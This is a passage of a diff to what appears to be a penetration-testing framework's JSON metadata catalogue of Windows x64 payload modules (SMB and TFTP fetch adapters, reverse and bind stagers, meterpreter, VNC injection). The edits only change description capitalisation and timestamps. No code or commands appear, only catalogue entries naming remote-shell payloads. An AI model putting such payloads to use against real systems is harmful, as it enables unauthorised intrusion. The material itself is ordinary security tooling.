"ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_winhttp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_winhttp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_winhttp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_winhttps": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttps",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttps",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_winhttps",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_winhttps"
|
||||
},
|
||||
"payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp": {
|
||||
"name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp",
|
||||
@@ -220351,7 +224012,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220361,7 +224022,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp",
|
||||
@@ -220394,7 +224055,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220404,7 +224065,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid",
|
||||
@@ -220436,7 +224097,7 @@
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220446,7 +224107,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_named_pipe",
|
||||
@@ -220478,7 +224139,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220488,7 +224149,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_tcp",
|
||||
@@ -220525,7 +224186,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220535,7 +224196,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_rc4",
|
||||
@@ -220568,7 +224229,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220578,7 +224239,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_uuid",
|
||||
@@ -220610,7 +224271,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220620,7 +224281,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_http",
|
||||
@@ -220654,7 +224315,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220664,7 +224325,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_https",
|
||||
@@ -220696,7 +224357,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220706,7 +224367,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_named_pipe",
|
||||
@@ -220738,7 +224399,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220748,7 +224409,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp",
|
||||
@@ -220785,7 +224446,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220795,7 +224456,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_rc4",
|
||||
@@ -220828,7 +224489,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220838,7 +224499,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_uuid",
|
||||
@@ -220870,7 +224531,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220880,7 +224541,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttp",
|
||||
@@ -220912,7 +224573,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220922,7 +224583,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttps",
|
||||
@@ -220954,7 +224615,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -220964,7 +224625,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/encrypted_shell/reverse_tcp",
|
||||
@@ -220996,7 +224657,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221006,7 +224667,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/encrypted_shell_reverse_tcp",
|
||||
@@ -221035,7 +224696,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nExecute an arbitrary command (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221045,7 +224706,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/exec",
|
||||
@@ -221075,7 +224736,7 @@
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nLoad an arbitrary x64 library path",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221085,7 +224746,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/loadlibrary",
|
||||
@@ -221114,7 +224775,7 @@
|
||||
"Brendan Watters",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -221124,7 +224785,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/messagebox",
|
||||
@@ -221155,7 +224816,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221166,7 +224827,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp",
|
||||
@@ -221199,7 +224860,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221210,7 +224871,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -221244,7 +224905,7 @@
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221255,7 +224916,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_named_pipe",
|
||||
@@ -221288,7 +224949,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221299,7 +224960,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp",
|
||||
@@ -221336,7 +224997,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221347,7 +225008,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4",
|
||||
@@ -221380,7 +225041,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221391,7 +225052,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid",
|
||||
@@ -221424,7 +225085,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221435,7 +225096,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_http",
|
||||
@@ -221471,7 +225132,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221482,7 +225143,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_https",
|
||||
@@ -221515,7 +225176,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221526,7 +225187,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_named_pipe",
|
||||
@@ -221559,7 +225220,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
